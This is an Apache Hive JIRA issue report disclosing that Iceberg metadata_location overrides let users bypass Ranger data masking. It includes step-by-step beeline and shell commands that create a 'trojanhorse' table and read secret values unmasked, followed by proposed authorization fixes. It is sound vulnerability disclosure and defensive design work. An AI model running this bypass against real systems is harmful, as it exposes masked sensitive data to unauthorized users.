[
https://issues.apache.org/jira/browse/HIVE-27322?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Janos Kovacs updated HIVE-27322:
--------------------------------
Parent: HIVE-27713
Issue Type: Sub-task (was: Bug)
> Iceberg: metadata location overrides can cause data breach - custom location
> to AuthZ
> -------------------------------------------------------------------------------------
>
> Key: HIVE-27322
> URL: https://issues.apache.org/jira/browse/HIVE-27322
> Project: Hive
> Issue Type: Sub-task
> Components: Iceberg integration
> Affects Versions: 4.0.0-alpha-2
> Reporter: Janos Kovacs
> Assignee: Ayush Saxena
> Priority: Blocker
> Labels: check, pull-request-available
> Fix For: 4.0.0
>
>
> Set to bug/blocker instead of enhancement due to its security related nature,
> Hive4 should not be released w/o fix for this. Please reset if needed.
>
> Context:
> * There are some core tables with sensitive data that users can only query
> with data masking enforced (e.g. via Ranger). Let's assume this is the
> `default.icebergsecured` table.
> * An end-user can only access the masked form of the sensitive data as
> expected...
> * The users also have privilege to create new tables in their own sandbox
> databases - let's assume this is the `default.trojanhorse` table for now.
> * The user can create a malicious table that exposes the sensitive data
> non-masked leading to a possible data breach.
> * Hive runs with doAs=false so that it can enforce FGAC and so that end
> users do not need direct file-system access
> Repro:
> * First make sure the data is secured by the masking policy:
> {noformat}
> <kinit as privileged user>
> beeline -e "
> DROP TABLE IF EXISTS default.icebergsecured PURGE;
> CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string)
> STORED BY ICEBERG;
> INSERT INTO default.icebergsecured VALUES
> ('You might be allowed to see this.','You are NOT allowed to see this!');
> "
> <kinit as end user>
> beeline -e "
> SELECT * FROM default.icebergsecured;
> "
> +------------------------------------+--------------------------------+
> | icebergsecured.txt | icebergsecured.secret |
> +------------------------------------+--------------------------------+
> | You might be allowed to see this. | MASKED BY RANGER FOR SECURITY |
> +------------------------------------+--------------------------------+
> {noformat}
> * Now let the user create the malicious table exposing the sensitive data:
> {noformat}
> <kinit as end user>
> SECURED_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" \
>   beeline -e "DESCRIBE FORMATTED default.icebergsecured;" 2>/dev/null \
>   | grep metadata_location | grep -v previous_metadata_location | awk '{print $5}')
> beeline -e "
> DROP TABLE IF EXISTS default.trojanhorse;
> CREATE EXTERNAL TABLE default.trojanhorse (txt string, secret string)
> STORED BY ICEBERG
> TBLPROPERTIES (
> 'metadata_location'='${SECURED_META_LOCATION}');
> SELECT * FROM default.trojanhorse;
> "
> +------------------------------------+-----------------------------------+
> | trojanhorse.txt | trojanhorse.secret |
> +------------------------------------+-----------------------------------+
> | You might be allowed to see this. | You are NOT allowed to see this! |
> +------------------------------------+-----------------------------------+
> {noformat}
>
> Currently - after HIVE-26707 - the rwstorage authorization only has either
> the dummy path or the explicit path set for uri:
> {noformat}
> Permission denied: user [oozie] does not have [RWSTORAGE] privilege on
> [iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ftrojanhorse%2Fmetadata%2Fdummy.metadata.json]
> Permission denied: user [oozie] does not have [RWSTORAGE] privilege on
> [iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ficebergsecured%2Fmetadata%2F00001-f4c2a428-30ce-4afd-82ff-d46ecbf02244.metadata.json]
>
> {noformat}
> This can be used only to decide whether a user is allowed to create
> Iceberg tables in certain databases with certain names, but controlling its
> metadata location is hard in that form:
> * it does not provide a variable of "default table location" so a rule needs
> to know the per-database table location or per-catalog warehouse location to
> be able to construct it
> * it does not provide a rich regex to filter out `/../` style directory
> references
> * there should also be a flag indicating whether an explicit metadata
> location was provided, instead of the dummy reference, which again
> needs explicit matching in the policy to handle
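
To illustrate why the encoded form is awkward for policy authors, here is a minimal Python sketch that splits one of the URIs from the error messages above and percent-decodes its location. It uses only the standard library; the helper name `decode_rwstorage_uri` is hypothetical and is not part of Hive or Ranger.

```python
from urllib.parse import urlsplit, parse_qs

def decode_rwstorage_uri(uri):
    """Split an iceberg:// authorization URI into (database, table, location).

    Hypothetical helper for illustration only; not a Hive or Ranger API.
    """
    parts = urlsplit(uri)
    database = parts.netloc
    table = parts.path.lstrip("/")
    # parse_qs percent-decodes the value of the "snapshot" query parameter
    location = parse_qs(parts.query)["snapshot"][0]
    return database, table, location

uri = ("iceberg://default/trojanhorse?snapshot="
       "%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ftrojanhorse"
       "%2Fmetadata%2Fdummy.metadata.json")
print(decode_rwstorage_uri(uri))
```

A policy written against the readable path only matches if the authorizer performs a decoding step like this one before comparing.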
>
> Proposed enhancement:
> * The URL for the Iceberg table's rwstorage authorization should be changed
> in the following way:
> ** the <database>/<table>?<location> is good but
> *** the location should not be url encoded, or at least the authorizer
> should check the policy against the decoded url
> *** the separator between the table and location should be "/" instead of
> "?" as "?" might be mixed with its regex meaning!
> *** "/" as a separator can also be confusing, as absolute paths start
> with it. Another separator character that does not conflict with regex,
> paths, or valid table-name characters might be even better.
> ** the "snapshot=" prefix seems irrelevant in this context; it should not
> be part of the <location>
> ** There is a need to differentiate the case where the location is only
> generated from the case where it is explicitly provided by the end user.
> For this, the "default" location might not be generated as a path but
> replaced with the fixed value "default_location" (note that it has no
> leading "/"). That way a single policy definition could be used to cover
> all tables in their default locations, like:
> {noformat}
> iceberg://mydatabase/*/default_location or
> iceberg://mydatabase/*/snapshot=default_location{noformat}
> *
> **
> *** "default" here means the table's default location which can depend on
> the warehouse location, the database location and the table's explicit
> location
> *** I know many developers don't like these types of hardcoded static values,
> but with such a value there is no need to modify the rwstorage authorization
> (and we are already using a similar method for the "METASTORE" type of
> storagehandler authorization)
> * The authorization request should include the rwstorage authorization only
> if the CREATE/ALTER/DROP is against the Iceberg table, and not if the
> Iceberg table is only a source in such statements - that might already be
> fixed via HIVE-27304
> * When any custom Iceberg metadata.json location is provided, the
> <location> must contain the provided path so that it can be properly
> authorized.
> * We should either not allow the backstep "/../" in any location or give an
> option to filter these out in the final authorization step.
> For example, a policy on
> {noformat}
> iceberg://mydatabase/mytable//data/use-case-1/* or
> iceberg://mydatabase/mytable/snapshot=/data/use-case-1/*{noformat}
> should not match access for
> {noformat}
> iceberg://mydatabase/mytable//data/use-case-1/../use-case-2/* or
> iceberg://mydatabase/mytable/snapshot=/data/use-case-1/../use-case-2/*{noformat}
> *
> ** Not allowing "/../" might be easier to handle on the Hive/Impala side
> ** But "/../" might still be valid if it is used within an allowed location.
> --> users should simply use a proper location w/o "/../"
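
The "/../" concern can be sketched in Python as follows. This is only an illustration under stated assumptions: `fnmatchcase` from the standard library stands in for the authorizer's wildcard matching (the real Ranger matcher may behave differently), the helper names `has_backstep` and `is_authorized` are hypothetical, and the metadata file name `v1.metadata.json` is made up for the example.

```python
from fnmatch import fnmatchcase

def has_backstep(resource):
    """Return True if any "/"-separated segment of the resource is ".."."""
    return ".." in resource.split("/")

def is_authorized(policy, resource):
    """Match a resource against a wildcard policy, refusing ".." segments first.

    Hypothetical helper; fnmatchcase is a stand-in for the real policy matcher.
    """
    if has_backstep(resource):
        return False
    return fnmatchcase(resource, policy)

policy = "iceberg://mydatabase/mytable/snapshot=/data/use-case-1/*"
ok = ("iceberg://mydatabase/mytable/snapshot="
      "/data/use-case-1/metadata/v1.metadata.json")
bad = ("iceberg://mydatabase/mytable/snapshot="
       "/data/use-case-1/../use-case-2/metadata/v1.metadata.json")

print(fnmatchcase(bad, policy))    # plain wildcard match on the raw string
print(is_authorized(policy, ok))   # same match with the ".." check in front
print(is_authorized(policy, bad))
```

A plain wildcard match accepts the "/../" resource because `*` happily consumes the backstep, which is why the rejection has to happen before (or as part of) the policy match.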
>
> With the above changes, a single new default Ranger policy could be used to
> globally enable the creation of Iceberg tables in any database in any table
> location but NOT using any custom metadata locations (in case the user
> doesn't want to globally turn storagehandler authorization off - via
> hive.security.authorization.tables.on.storagehandlers=false - because of
> other handlers such as HBase and Kafka):
> {noformat}
> iceberg://*/*/default_location or
> iceberg://*/*/snapshot=default_location {noformat}
> Note that there is no extra "/" in front of "default_location", only the
> separator character in the first case
>
> Also, with the above changes we could allow users to configure authorization
> for custom/shared data locations via:
> {noformat}
> iceberg://mydatabase/*//some/shared/table/location/* or
> iceberg://mydatabase/*/snapshot=/some/shared/table/location/* {noformat}
>
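
As a rough sketch of how the proposed "default_location" placeholder could behave, the Python below models a resource as separate (database, table, location) components and matches each one on its own. Everything here is an assumption for illustration: the names `resource_for` and `policy_allows` are hypothetical, and `fnmatchcase` only approximates whatever wildcard matching the authorizer actually uses.

```python
from fnmatch import fnmatchcase

# Fixed placeholder proposed in the issue; note there is no leading "/".
DEFAULT_LOCATION = "default_location"

def resource_for(database, table, explicit_location=None):
    """Return (database, table, location) for an rwstorage check.

    Hypothetical helper: the placeholder is used only when the user did not
    supply a metadata location.
    """
    return (database, table, explicit_location or DEFAULT_LOCATION)

def policy_allows(policy, resource):
    """Match each component separately so "*" in one cannot spill into another."""
    return all(fnmatchcase(value, pattern)
               for pattern, value in zip(policy, resource))

default_only = ("*", "*", DEFAULT_LOCATION)
shared = ("mydatabase", "*", "/some/shared/table/location/*")

secured_meta = ("/warehouse/tablespace/external/hive/icebergsecured/metadata/"
                "00001-f4c2a428-30ce-4afd-82ff-d46ecbf02244.metadata.json")

print(policy_allows(default_only, resource_for("default", "plain_table")))
print(policy_allows(default_only,
                    resource_for("default", "trojanhorse", secured_meta)))
```

Because an explicit location is an absolute path starting with "/", it can never equal the placeholder, so the default-only policy would reject the `trojanhorse` table from the repro while still allowing tables created in their default locations.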